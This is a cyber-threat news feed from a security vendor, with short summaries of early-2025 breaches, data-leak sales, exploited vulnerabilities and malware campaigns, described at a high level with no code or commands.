news
Breaking Cyber News From Cyberint
Breaking news feed of the latest cyber incidents, breaches, vulnerabilities, malware, ransomware and so much more.
- All Items
- Middle East
- Israel
- Finance
- Shva
- Asia
- Technology
- Coreinjection
- CVE-2025-0282
- Spawn
- Cve-2025-0282
- Spear Phishing
- Powershell
- South Korea
- Apt43
- Exfiltration Over C2 Channel
- Remote Access Software
- Eastern Asia
- CVE-2023-32315
- Southern Asia
- North America
- Cve-2023-42793
- Africa
- South-Eastern Asia
- Kazakhstan
- Angola
- Energy
- India
- CVE-2023-48788
- Uzbekistan
- Transportation
- Australia And New Zealand
- CVE-2021-34473
- Australia
- Myanmar
- Telecommunications
- Nigeria
- Northern Africa
- Central Asia
- CVE-2024-1709
- Oil And Gas Extraction
- Cve-2022-41352
- Cve-2023-23397
- Canada
- Manufacturing
- Cve-2024-1709
- Sandworm Team
- CVE-2023-42793
- Turkey
- Argentina
- Egypt
- Cve-2021-34473
- Cve-2023-32315
- China
- United States
- Government
- CVE-2022-41352
- Pakistan
- CVE-2023-23397
- Sub-Saharan Africa
- Cve-2023-48788
- Latin America And The Caribbean
- Business Services
- Zklend
- Netsupportmanager Rat
- Cve-2024-57968
- Cve-2025-25181
- CVE-2025-25181
- Aspxspy
- Xe Group
- CVE-2024-57968
- CVE-2024-57728
- Cve-2024-57728
- Cve-2024-57727
- CVE-2024-57727
- Cve-2024-57726
- CVE-2024-57726
- Mtn
- South Africa
- Arikos
- Taiwan
- Education
- Iispy
- Philippines
- Dragonrank
- Vietnam
- Brazil
- Japan
- Thailand
- Singapore
- United Kingdom
- Europe
- Imi
- Handala
- Israel Police - Cyber Crime Unit
- Phishing
- Proxy
- Input Capture
- Data From Local System
- Pebbledash
- Forcecopy
- Scripting
- Mexico
- Oihec
- Ministry Of National Defense
- Application Access Token
- Multi-Factor Authentication Request Generation
- Account Manipulation
- Application Layer Protocol
- Healthcare
- Microsoft
- Credentials In Files
- Remote System Discovery
- Archive Via Utility
- National Bank Of The Kyrgyz Republic
- System Network Configuration Discovery
- Account Discovery
- Query Registry
- Silent Lynx
- Ministry Of Economy And Finance Of Kyrgyzstan
- Network Service Discovery
- Exfiltration To Cloud Storage
- Malicious File
- Domain Accounts
- System Service Discovery
- File And Directory Discovery
- Email Addresses
- Registry Run Keys / Startup Folder
- Kyrgyzstan
- Keylogging
- Asynchrat
- Automotive
- Grubhub
- Spearphishing Link
- Angel Drainer
- System Information Discovery
- Stealc
- Automated Exfiltration
- Amos
- Spearphishing Attachment
- Drive-By Compromise
- Obfuscated Files Or Information
- Os Credential Dumping
- Web Protocols
- The Knesset
- Dna
- Western Europe
- Daxium
- Retail
- Energyweaponuser
- France
- Intelbroker
- Cve-2024-41710
- CVE-2024-41710
- Aquabot
- Mitel
- 0Mid16B
- Cardinal Health
- Ministry Of National Security
- Varun
- E.Leclerc
- exclusive
- Tornet
- Purecrypter
- Poland
- Agent Tesla
- Germany
- Eastern Europe
- Frederick Health
- Smiths Group
- Deepseek
- Sportadmin
- Northern Europe
- Sweden
- Southern Europe
- Italy
- Fratelli D'Italia
- Truth-Chan
- Lumma Stealer
- Colombia
- Talktalk
- B0Nd
- Acobro
- Chile
- Sorb
- Peru
- Tcobro
- Octagon
- Spain
- Guardia Civil
- Ministry Of Defense Of Spain
- Homebrew
- Embedded Payloads
- CVE-2017-11882
- Exploitation For Client Execution
- Web Service
- Cve-2017-11882
- Javascript
- Visual Basic
- Mirai
- CVE-2024-12856
- Cve-2024-12856
- Ivanti
- Hewlett Packard Enterprise (Hpe)
- Zjj
- CVE-2024-49415
- Cve-2024-49415
- Cve-2024-56337
- CVE-2024-56337
- CVE-2024-44243
- Cve-2024-44243
- CVE-2024-13159
- Cve-2024-13160
- CVE-2024-13160
- Cve-2024-13159
- CVE-2024-13161
- Cve-2024-10811
- CVE-2024-10811
- Cve-2024-13161
- Cve-2024-12087
- CVE-2024-12747
- CVE-2024-12087
- CVE-2024-12088
- CVE-2024-12086
- CVE-2024-12085
- CVE-2024-12084
- Cve-2024-12085
- Cve-2024-12084
- Cve-2024-12088
- Cve-2024-12747
- Cve-2024-12086
- Ay4Me
- The Otelier
-
Feb 13, 2025
Cyber Attack on 'Shva' Disrupts Credit Transactions Across Israel
A cyber attack targeted Shva, a key provider of transaction infrastructure and financial information solutions in Israel, leading to a nationwide failure of credit card transactions. Reportedly, the company's systems experienced a 26-minute denial-of-service (DoS) attack, temporarily disrupting credit card payments.
-
Feb 13, 2025
Threat Actor Offers Access to Israeli Electronics Company
A threat actor known as "CoreInjection" is offering access to an Israeli electronics company on the cybercrime forum BreachForums. According to the threat actor, this access could provide control over more than 4 million user accounts and is being sold for $50,000. However, the reliability of the threat actor remains unclear, and due to the lack of sample data, it is impossible to verify the authenticity of the claim.
-
Feb 13, 2025
Exploitation of Critical Ivanti Connect Secure Vulnerability Leads to SPAWNCHIMERA Malware Deployment
Cybersecurity experts have identified the active exploitation of a severe vulnerability (CVE-2025-0282) in Ivanti Connect Secure (ICS) appliances, allowing remote attackers to execute code and infiltrate networks. The flaw, a stack-based buffer overflow with a CVSS score of 9.0, has been leveraged to deploy the advanced SPAWNCHIMERA malware, an evolution of the SPAWN malware family. SPAWNCHIMERA incorporates sophisticated techniques such as UNIX domain socket-based communication, dynamic patching of the vulnerability, enhanced obfuscation, and resistance to debugging, making it harder to detect and analyze. Despite Ivanti releasing patches in January 2025, thousands of devices remain exposed, highlighting the slow pace of remediation.
-
Feb 13, 2025
North Korean Threat Actor Kimsuky exploit powershell trick to hijack devices
The North Korean-linked threat actor Kimsuky has been observed employing a new tactic that involves deceiving targets into executing malicious PowerShell commands under the guise of a South Korean government official. This approach includes spear-phishing emails with PDF attachments that prompt victims to follow a registration link, leading them to run harmful code that installs a remote desktop tool for data exfiltration. This method marks a significant shift in Kimsuky's operations.
-
Feb 13, 2025
Global Expansion of Sandworm's BadPilot Campaign
A subgroup of the Russian state-sponsored hacking group Sandworm, known as Seashell Blizzard, has been linked to a multi-year initial access operation called Badpilot, targeting a wide range of sectors globally, including energy, telecommunications, and government entities. This operation has expanded significantly over the past three years, moving beyond its traditional focus on Eastern Europe to compromise systems in North America, Europe, and various other countries. The group exploits known vulnerabilities in software like Microsoft Exchange and Fortinet to gain access, employing a mix of opportunistic and targeted attacks to maintain persistent access and achieve strategic objectives aligned with Russian geopolitical interests.
-
Feb 13, 2025
zkLend Suffers $9.5M Crypto Breach
"zkLend," a decentralized money-market protocol built on "Starknet", experienced a security breach resulting in the theft of 3,600 Ethereum, valued at $9.5 million. The incident exploited a rounding error bug in the smart contract's mint() function. "zkLend" has offered the threat actor a deal: return 90% of the funds (3,300 ETH) by February 14, 2025, and keep the remaining 10% as a whitehat bounty, avoiding legal repercussions. Otherwise, "zkLend" will pursue legal action with the help of security firms and law enforcement.
-
Feb 12, 2025
Threat Actor Use ClickFix Technique to Deliver NetSupport RAT in 2025
Since early January 2025, threat actors have increasingly employed the ClickFix technique to deliver the NetSupport RAT, a remote access trojan, to victim systems. Initially designed as a legitimate remote IT support tool, NetSupport RAT has been repurposed by attackers to gain full control over compromised devices, enabling real-time screen monitoring, file manipulation, and execution of malicious commands. The ClickFix technique works by injecting a fake CAPTCHA page on compromised websites, tricking users into executing malicious PowerShell commands that download the RAT client from a remote server disguised as PNG image files. This method allows attackers to target organizations and steal sensitive data, including screenshots, audio, video, and files.
-
Feb 12, 2025
XE Group Targets Supply Chains with Exploited Vulnerabilities to Deploy Web Shells and Reverse Shells
Threat actors, particularly the Vietnamese cybercrime group XE Group, have been exploiting multiple security flaws in software like Progress Telerik UI for ASP.NET AJAX and Advantive VeraCore to maintain persistent remote access on compromised systems. The group, known for evolving from credit card skimming to targeted information theft, is now focused on the manufacturing and distribution sectors, leveraging new vulnerabilities and advanced tactics. Recent exploitation of VeraCore flaws, including CVE-2024-57968 and CVE-2025-25181, has led to the deployment of ASPXSpy web shells and Meterpreter payloads, facilitating network scanning, data exfiltration, and command execution. This marks XE Group's first known use of zero-day vulnerabilities, showcasing a heightened level of sophistication. The group's persistence in maintaining access, even reactivating web shells years after initial deployment, reflects a strategic focus on long-term operations and systemic supply chain vulnerabilities.
-
Feb 12, 2025
Threat Actors Exploit SimpleHelp RMM Vulnerabilities in Ransomware Campaigns
Threat actors are actively exploiting recently disclosed security flaws in SimpleHelp's Remote Monitoring and Management (RMM) software to gain initial access and establish persistence in networks, potentially paving the way for ransomware attacks. The vulnerabilities, identified as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, were disclosed in January 2025 and allow for privilege escalation, remote code execution, and information disclosure. Field Effect's investigation revealed that after exploiting these vulnerabilities, attackers performed network discovery, created administrator accounts, and set up a Cloudflare tunnel to facilitate lateral movement and stealthily route traffic.
-
Feb 11, 2025
Threat Actor Arikos Claims MTN Ghana Data Breach
A threat actor known as "Arikos" has claimed responsibility for a significant data breach on the dark net forum "BreachForums," involving "MTN Ghana," a leading telecommunications provider. "Arikos" alleges possession of a full database dump containing sensitive customer information, including names, dates of birth, ID card details, WhatsApp numbers, company affiliations, email addresses, and over 150,000 customer photos. The data is being sold for $10,000. "MTN Ghana," headquartered in Accra, is a major player in the telecom sector with 15 million subscribers.
-
Feb 11, 2025
SEO Manipulation Campaign Targets IIS Servers to Install BadIIS Malware and Redirect Users to Gambling Sites
A threat group, suspected to be the Chinese-speaking DragonRank, has been targeting Internet Information Services (IIS) servers across Asia, including in countries like India, Thailand, Vietnam, and Japan, as part of an SEO manipulation campaign to deploy BadIIS malware. The attackers are likely financially motivated, redirecting users to illegal gambling websites. Targets include government, university, technology, and telecommunications sectors. The compromised servers serve altered content, either redirecting to gambling sites or connecting to malicious servers. BadIIS alters HTTP response headers, checking specific fields to redirect users to suspicious pages. The malware shares similarities with other malware variants associated with groups involved in SEO fraud and proxy services.
-
Feb 09, 2025
U.K.-Based Engineering Firm IMI Informs Investors of a Data Breach
In February 2025, UK engineering giant IMI became the victim of a data breach when threat actors managed to gain unauthorized access to its systems. According to IMI, the nature and extent of the data compromised have not been disclosed, but the company is currently responding to the cyber security incident and has engaged external experts to investigate and contain the attack.
-
Feb 09, 2025
Handala Hack Claims Breach of Israeli Police
Handala Hack claims to have breached the Israeli police, allegedly obtaining 2.1TB of sensitive internal data. The group has released samples of the purported data, including photos of police officers, screenshots of documents such as permits and diplomas, and a link to download what they claim are 350,000 internal documents.
-
Feb 09, 2025
Kimsuky Group Uses Spear-Phishing to Deploy ForceCopy Info-Stealer Malware
The North Korean hacking group Kimsuky has been observed conducting spear-phishing attacks to deliver a new information-stealer malware called forceCopy. The attacks begin with phishing emails containing a Windows shortcut file disguised as a Microsoft Office or PDF document. Opening the attachment triggers PowerShell or mshta.exe to download additional malicious payloads, including the PEBBLEDASH trojan, a custom Remote Desktop utility (RDP Wrapper), and proxy malware for persistent external communications. Kimsuky also uses a PowerShell-based keylogger and forceCopy to steal files from web browser directories, targeting credentials stored in browser configurations.
-
Feb 06, 2025
Data Breach Exposes 100GB of Information from the Mexican Secretariat of National Defense
A threat actor group known as "OIHEC" claimed on the dark net forum "BreachForums," to have leaked confidential information from the "Mexican Secretariat of National Defense." According to the threat actor group, the data includes soldiers' credentials, emails, and more, all of which are available for purchase.
-
Feb 06, 2025
Phishing Campaign Targets Microsoft ADFS to Bypass MFA and Steal Credentials
A phishing campaign targets organizations using Microsoft's "Active Directory Federation Services" (ADFS) to steal credentials and bypass multi-factor authentication (MFA). The threat actors primarily target education, healthcare, and government sectors, sending phishing emails impersonating IT teams and leading victims to spoofed ADFS login pages. Once the victim submits their username, password, and MFA details, the threat actors gain access to corporate email accounts, enabling them to conduct "business email compromise" (BEC) attacks and steal sensitive data. The threat actors also use techniques like VPNs to obscure their location and evade detection.
-
Feb 05, 2025
Silent Lynx: New Threat Actor Targets Central Asia with Sophisticated Cyber Espionage Campaigns
The previously unknown cyber threat group Silent Lynx has been linked to cyberattacks targeting entities in Kyrgyzstan and Turkmenistan, including embassies, government-backed banks, and think tanks. The group's activities, believed to originate from Kazakhstan, focus on espionage against Eastern European and Central Asian organizations, particularly in economic decision-making and banking sectors. Their attacks typically begin with spear-phishing emails containing malicious RAR archives that deploy remote access payloads. The group uses multi-stage attack strategies, including ISO files, C++ binaries, PowerShell scripts, and Golang implants, often relying on Telegram bots for command execution and data exfiltration.
-
Feb 05, 2025
AsynchRAT Campaign
Threat Actors are utilizing a new malware campaign that delivers the AsyncRAT remote access trojan (RAT) through a multi-stage attack chain exploiting Python payloads and TryCloudflare tunnels. The attack begins with a phishing email containing a Dropbox URL, which leads to a ZIP archive download. Inside, an internet shortcut file triggers a Windows shortcut (LNK) file that further escalates the infection. The LNK file uses TryCloudflare, a legitimate service, to expose a server and download a batch script that eventually deploys AsyncRAT.
-
Feb 04, 2025
Grubhub Confirms Data was Taken in Recent Data Breach
In February 2025, Grubhub became the victim of a data breach when threat actors managed to gain access to its internal systems. According to Grubhub, personal details belonging to an undisclosed number of customers, merchants, and drivers were taken, including names, email addresses, phone numbers, and partial payment card information.
-
Feb 04, 2025
Spear Phishing Campaign by Crazy Evil
The Russian-speaking cybercrime group Crazy Evil has been linked to over 10 active social media scams that use personalized lures to trick victims into installing malware like StealC, AMOS, and Angel Drainer. Specializing in identity fraud and cryptocurrency theft, Crazy Evil employs "traffers" to redirect legitimate traffic to malicious phishing pages, with the goal of compromising systems running on both Windows and macOS. The group, which has been active since at least 2021, operates primarily through Telegram and has made over $5 million in illicit revenue by targeting digital assets like NFTs, payment cards, and cryptocurrencies. Crazy Evil runs several sub-teams, each responsible for a specific scam, such as fake job offers or investment schemes, and has been known to provide affiliates with instructional materials to carry out attacks.
-
Feb 03, 2025
Knesset of Israel Data Leak: Over 26,000 Documents Exposed
A data leak involving the "Knesset of Israel" and several other entities has surfaced on the dark web forum "BreachForums." The leaked dataset, attributed to the threat actor "dna," includes over 26,000 documents, totaling 16GB in size, primarily in PDF format.
-
Feb 02, 2025
Data Breach by Threat Actors IntelBroker and EnergyWeaponUser on Daxium Exposes Sensitive User Information
In January 2025, "Daxium" experienced a data breach that exposed the personal information of 52,000 users. The compromised data includes email addresses and full names. The breach, published by the threat actors "IntelBroker" and "EnergyWeaponUser" on the dark net forum "BreachForums," contains sensitive data, such as personal details tied to various documents and files. This leak includes information like user IDs, document details, and various associated files, which have been available for download. The breach impacts multiple users, with associated metadata and files linked to their accounts.
-
Feb 02, 2025
New aquabot botnet exploits cve-2024-41710 in mitel phones for DDoS attacks
A new variant of the Mirai botnet known as "Aquabot," which has been observed exploiting a medium-severity vulnerability (CVE-2024-41710) in Mitel phones to incorporate them into a network for launching Distributed Denial-of-Service (DDoS) attacks. This vulnerability, which allows command injection during the boot process of specific Mitel phone models, was addressed by Mitel in July 2024. The article highlights that the Aquabot variant has been active since November 2023 and has been detected attempting to exploit this vulnerability since January 2025. The botnet is reportedly being offered as a DDoS service on Telegram under various aliases.
-
Feb 02, 2025
Threat Actor Leaks CSMP Database Allegedly Belonging to Cardinal Health As a Result of a Supply Chain Attack
On February 1, 2025, a threat actor named "0mid16B" claimed responsibility for leaking the Controlled Substance Monitoring (CSMP) database of Cardinal Health, Inc., the third-largest pharmaceutical wholesaler in the U.S. The data, dated January 18, 2025, was stolen following a supply chain attack on APEX Custom Software on January 16, 2025. The breach affected numerous pharmacy and healthcare clients, exposing sensitive information such as usernames, passwords, and facility details.
-
Jan 29, 2025
'Handala Hack' Claims Breach of Israeli Ministry of National Security
'Handala Hack' claims to have breached the Israeli Ministry of National Security, allegedly obtaining 4 TB of classified data. The stolen information reportedly includes confidential documents, screenshots of security officers' identification cards, recordings of police calls, and more. In addition, they purportedly compromised several emergency systems, triggering red alerts and broadcasting messages containing Hamas propaganda.
-
Jan 29, 2025
E.Leclerc - Breach - 2025-01-23
A threat actor aliased "varun" announced the sale of a huge database belonging to Primes Energie Leclerc, a green energy supplier from France known for their bonus system, wherein they pay financial aid to beneficiaries who conduct energy-saving work. 4.7 million customers might be affected, as the threat actor claims that their sample data includes sensitive PII. At the time of writing, the threat actor had announced that the database had been sold.
-
Jan 29, 2025
Ongoing Phishing Campaign Targets Poland and Germany With a Wide Range of Malware
A new phishing campaign targeting users in Poland and Germany has been detected, the campaign, has been conducted by a financially motivated threat actor since at least July 2024. The attacks, which begin with phishing emails disguised as financial institution or company communications, use malicious ".tgz" file attachments to deliver malware. Once opened, these files launch a .NET loader that activates PureCrypter, which in turn installs a previously undocumented backdoor, TorNet. TorNet communicates with the attacker’s server over the TOR network, allowing for persistence and further intrusions. The actor employs various techniques to evade detection, such as disconnecting and reconnecting the victim’s machine from the network and running anti-debugger and anti-malware checks. The malware also has the ability to execute arbitrary code, increasing the attack surface for further exploitation.
-
Jan 29, 2025
Frederick Health Hospital Affected by Ransomware Incident, Emergency Services Impacted
"Frederick Health Hospital's" systems were taken offline this Monday following a ransomware incident, leading to significant disruptions in operations, including the diversion of ambulances to other emergency departments. The hospital was placed under a “mini disaster” designation, and its emergency department suspended operations, as it faced red and yellow alerts for no available beds and limited capacity to treat new patients.
-
Jan 28, 2025
Smiths Group - Breach - 2024-12-27
British engineering firm Smiths Group is managing a cybersecurity incident that involved unauthorized access to its systems. Smiths Group said it was working with experts to recover its systems and to determine any wider impact. It added it would comply with all relevant regulatory requirements. The company did not provide further details and said it would give further updates as and when appropriate.
-
Jan 28, 2025
DeepSeek AI Platform Temporarily Disables Registrations Due to DDoS Incident
Chinese AI platform "DeepSeek" has disabled new registrations on its DeepSeek-V3 chat platform following a believed large-scale DDoS incident. The incident, which targeted its API and Web Chat services, led the company to restrict new sign-ups to maintain service stability. Despite the issue, existing users can still log in, and new users can gain access via Google login. However, they will share personal information like name, email, and profile picture with "DeepSeek." The incident comes amid growing competition in the AI industry following the platform's recent surge in popularity due to its advanced AI model.
-
Jan 27, 2025
SportAdmin - Breach - 2025-01-16
SportAdmin experienced a cybersecurity incident involving a data breach by an external attacker, resulting in system downtime and potential exposure of personal data. An investigation is underway, and the company is cooperating with authorities, with efforts in place to restore services and support affected users.
-
Jan 27, 2025
Fratelli d'Italia Political Party Website Breach Exposes Personal Data
In 2024, a directory listing vulnerability on the website of "Fratelli d'Italia," a political party in Italy, was exploited by the threat actor known as "Truth-chan" to scrape and leak a large amount of personal data from approximately 12-13,000 curriculums. The exposed data includes sensitive information such as names, emails, addresses, work experience, education, languages spoken, and more. The data was published on the dark web forum "BreachForums."
-
Jan 26, 2025
Fake CAPTCHA Campaign Delivers Lumma Information Stealer
Threat Actors have been using fake CAPTCHA verification pages to deliver the Lumma information stealer in a new campaign, affecting victims in multiple countries, including Argentina, Colombia, the US, and the Philippines. The attack begins when a user visits a compromised site and is tricked into running a command that downloads an HTA file. This file executes a series of PowerShell scripts, eventually loading the Lumma payload while bypassing detection mechanisms. The campaign targets various industries, especially telecom, and leverages techniques that evade browser defenses by exploiting user interactions outside of the browser. The Lumma Stealer is part of a malware-as-a-service model and has become more difficult to detect due to its evolving delivery methods, including counterfeit domains mimicking popular sites like Reddit and WeTransfer.
-
Jan 26, 2025
TalkTalk Data Leak Exposes Over 18 Million Users’ Personal Information
In January 2025, a data leak involving "TalkTalk," a UK-based telecommunications provider, exposed the personal information of 18,839,551 current and former customers. The leaked dataset includes sensitive details such as full names, email addresses, phone numbers (both home and business), subscriber PINs, and IP addresses. This leak is being sold on the underground forum "BreachForums" by the threat actor known as "b0nd," with a price of $30,000, payable in XMR or BTC.
-
Jan 23, 2025
Threat Actor selling database of Chilean outsorcing company ACobro
The threat actor under the name "Sorb" is offering for sale a database potentially related to the outsourcing company from Chile "ACobro" on the cybercrime forum known as "breachforums". According to the threat actor and the sample provided the data base contains 995K records with multiple users' details such as, rut, name, phone, email, address, doc number, etc. The price posted by the threat actor is $600
-
Jan 23, 2025
Threat Actor selling database of Peruvian consulting company TCobro
The threat actor under the name "Sorb" is offering for sale a database potentially related to the consulting company from Peru "TCobro" on the cybercrime forum known as "breachforums". According to the threat actor the data base was copied in csv format and includes 832K users' details. Furthermore, the threat actor claims that there is access to the mysql server and web crm panel. Based sample provide the details include document id, phone number and client's name. The price posted by the threat actor is $400, where "Sorb" mentions that the fastest buyer will have time to get access to mysql and web panel crm administrator level
-
Jan 23, 2025
Octagon Reports Data Breach Affecting Consumer Information
"Octagon," a global sports and entertainment agency, has reported a data breach involving unauthorized access to sensitive consumer information, including names, Social Security numbers, driver’s license numbers, and financial account details. The company began notifying affected individuals on December 31.
-
Jan 22, 2025
Spanish Guardia Civil and Ministry of Defense Data Leak
On January 20, 2025, it was revealed that a significant data leak had compromised members of Spain's Guardia Civil, Armed Forces, and Ministry of Defense. The leak is believed to be linked to a ransomware attack on Medios de Prevención Externos Sur SL, a third-party contractor responsible for medical examinations in March 2024. Three databases containing sensitive data have been published on the dark web, with two reportedly linked to Guardia Civil members and one to the Ministry of Defense. The exposed information includes names, email addresses, professional identifiers, dates of birth, and medical examination results, potentially affecting 109,000 Guardia Civil members and 84,000 Ministry of Defense personnel.
-
Jan 22, 2025
Fake Homebrew Google Ads Spread Malware to Mac Users
A recent malicious Google ads campaign targeted "Homebrew" users, redirecting them to a fake "Homebrew" site (brewe.sh) that delivered "AMOS" malware to Mac and Linux devices. The malware, an infostealer, steals sensitive data such as credentials, browser information, and cryptocurrency wallets. "Homebrew" is a popular open-source package manager for macOS and Linux that allows users to easily install and manage software from the command line.
-
Jan 21, 2025
Threat Actors Embed Malware in Images to Distribute InfoStealers
Threat actors have been using images to deliver malware such as the VIP Keylogger and 0bj3ctivity Stealer through separate campaigns. The attacks begin with phishing emails disguised as invoices or purchase orders, containing malicious attachments that exploit a known security vulnerability in Equation Editor (CVE-2017-11882) to run a VBScript file. This script decodes and executes a PowerShell script that retrieves an image from archive[.]org, extracting a Base64-encoded code which is converted into a .NET executable. This executable then downloads and runs malware, including the VIP Keylogger for data theft or 0bj3ctivity Stealer in a different variant.
-
Jan 21, 2025
Mirai botnet variant exploits four-faith router vulnerability for ddos attacks
A new variant of the Mirai botnet, named "gayfemboy," has been discovered exploiting a zero-day vulnerability in Four-Faith industrial routers. This malware has been active since February 2024 and is primarily targeting routers with default credentials, utilizing over 20 known vulnerabilities for initial access. The botnet maintains around 15,000 daily active IP addresses, with infections mainly in China, Iran, Russia, Turkey, and the United States. The vulnerability, identified as CVE-2024-12856, has a CVSS score of 7.2 and allows for OS command injection on specific router models. The botnet has been conducting DDoS attacks against various entities, generating significant traffic.
-
Jan 21, 2025
Ivanti flaw cve-2025-0282 actively exploited, impacts connect secure and policy secure
A critical security vulnerability (CVE-2025-0282) affecting Ivanti Connect Secure, Policy Secure, and ZTA Gateways has been actively exploited since mid-December 2024. With a CVSS score of 9.0, this vulnerability is a stack-based buffer overflow that allows unauthenticated remote code execution. Ivanti has acknowledged that a limited number of its customers have been exploited due to this vulnerability. Mandiant, a cybersecurity company, has linked the exploitation of this vulnerability to a China-nexus threat actor known as UNC5337, which is considered part of a larger group (UNC5221). The attacks have led to deploying new malware families, including Dryhook and Phasejam. The article also highlights the sophisticated methods the threat actor uses, including log manipulation and the establishment of persistence mechanisms.
-
Jan 21, 2025
Hewlett Packard Enterprise (HPE) Data Breach Exposes Sensitive Code and User Information
A data breach involving "Hewlett Packard Enterprise" (HPE) has been reported by threat actors on the dark net forum "BreachForums," including "IntelBroker," "zjj," and "EnergyWeaponUser." The breach has been ongoing for about two days and has compromised a wide range of sensitive data. This includes private source code from GitHub repositories, Docker builds, SAP Hybris, and certificates (both private and public keys). Additional data exposed includes product source code for Zerto and iLO, as well as old user PII related to deliveries. The stolen data is being offered for sale in exchange for Monero (XMR).
-
Jan 20, 2025
google project zero researcher uncovers zero-click exploit targeting samsung devices
A newly discovered security vulnerability in the Monkey's Audio (APE) decoder on Samsung smartphones has been patched. This high-severity vulnerability tracked as CVE-2024-49415 has a CVSS score of 8.1 and affects Samsung devices running Android versions 12, 13, and 14. The flaw allows remote attackers to execute arbitrary code through an out-of-bounds write in the `libsaped.so` library, specifically when Google Messages is configured for Rich Communication Services (RCS). The vulnerability can be exploited without user interaction, making it a zero-click attack. The researcher who identified this flaw is Natalie Silvanovich from Google Project Zero.
-
Jan 20, 2025
apache tomcat vulnerability cve-2024-56337 exposes servers to rce attacks
The Apache Software Foundation (ASF) has released a security update for its Tomcat server software to address a significant vulnerability that could lead to remote code execution (RCE) under specific conditions. This vulnerability, identified as CVE-2024-56337, is an incomplete mitigation of another critical flaw, CVE-2024-50379, which was previously addressed. Both vulnerabilities are time-of-check time-of-use (TOCTOU) race condition issues that can allow code execution on case-insensitive file systems when the default servlet is enabled for writing. Users of affected Tomcat versions are advised to make specific configuration changes based on their Java version to fully mitigate the risks.
-
Jan 20, 2025
Multiple Israeli Organizations Report Disruptions Linked to an Unknown Threat Actor
Several Israeli organizations have reported incidents where their printers were commandeered to produce pages containing pro-Palestinian propaganda. Additionally, reports indicate that files were corrupted, desktop wallpapers were altered, and other disruptions occurred. The identity of the attacker remains unconfirmed, and the full scope of the campaign has yet to be determined. The following hashes have been identified in connection with this campaign: - C316C600E82B91ECE48EF74615F121DE5E05B79A - 8cefad76c013e714c5cd8cff549b8c092ab2c9aa62ec9f22d2edf0e2c3cfdb9f (SHA256)
-
Jan 20, 2025
microsoft uncovers macos vulnerability cve-2024-44243 allowing rootkit installation
Microsoft has reported a newly discovered vulnerability in Apple's macOS, identified as CVE-2024-44243, which has been patched in macOS Sequoia 15.2. This medium-severity flaw (CVSS score: 5.5) allows attackers running as "root" to bypass the system integrity protection (SIP) of macOS, potentially enabling the installation of malicious kernel drivers and persistent malware. The vulnerability is characterized as a "configuration issue" that could allow malicious applications to modify protected areas of the file system. Jonathan Baror from Microsoft's threat intelligence team highlighted the serious implications of this vulnerability, including the potential for attackers to install rootkits and expand their attack surface. The vulnerability exploits the "com.apple.rootless.install.heritable" entitlement of the storage kit daemon (storagekitd) to bypass SIP protections.
-
Jan 20, 2025
researcher uncovers critical flaws in multiple versions of ivanti endpoint manager
Ivanti has released security updates to address several critical vulnerabilities affecting its Endpoint Manager (EPM), Avalanche, and Application Control Engine. Four critical flaws, rated 9.8 on the CVSS scale, are related to absolute path traversal vulnerabilities in EPM, which could allow remote unauthenticated attackers to leak sensitive information. The vulnerabilities are identified by the following CVEs: CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159. These flaws affect EPM versions prior to the January 2025 security update. The vulnerabilities were discovered and reported by security researcher Zach Hanley from Horizon3.ai. Additionally, Ivanti patched multiple high-severity bugs in Avalanche and Application Control Engine that could allow attackers to bypass authentication and leak sensitive information. The company has stated that there is no evidence of these vulnerabilities being exploited in the wild and has enhanced its internal security measures.
-
Jan 20, 2025
google cloud researchers uncover flaws in rsync file synchronization tool - CVE-2024-12084
These vulnerabilities could allow attackers to execute arbitrary code on connected clients by exploiting a malicious server. The vulnerabilities include issues such as heap-buffer overflow, information disclosure, and path traversal. The vulnerabilities have been assigned CVE codes, and the most severe one (CVE-2024-12084) has a CVSS score of 9.8. Researchers from Google Cloud and a security researcher named Aleksei Gorban have been credited with discovering these flaws. Patches have been released to address these vulnerabilities, and mitigations are suggested for users unable to apply the updates. Vulnerability Discovered: CVE-2024-12084, CVE-2024-12085, CVE-2024-12086, CVE-2024-12087, CVE-2024-12088, CVE-2024-12747
-
Jan 20, 2025
Otelier Data Breach Exposes Millions of Hotel Reservation Records
A significant data breach has compromised the cloud-based hotel management platform "Otelier," affecting over 10,000 hotels globally. The breach exposed 7.8TB of sensitive data, including 7.4 million documents, MongoDB and SQL database dumps, email automation records, and more. It contains personal information such as guest names, phone numbers, addresses, credit card details, and hotel reservation data for guests of major hotel chains like "Marriott," "Hilton," and "Hyatt." The breach occurred between July and October 2024, and the data was leaked by threat actor "Ay4me," who has made it available for sale on the darknet forum "BreachForums."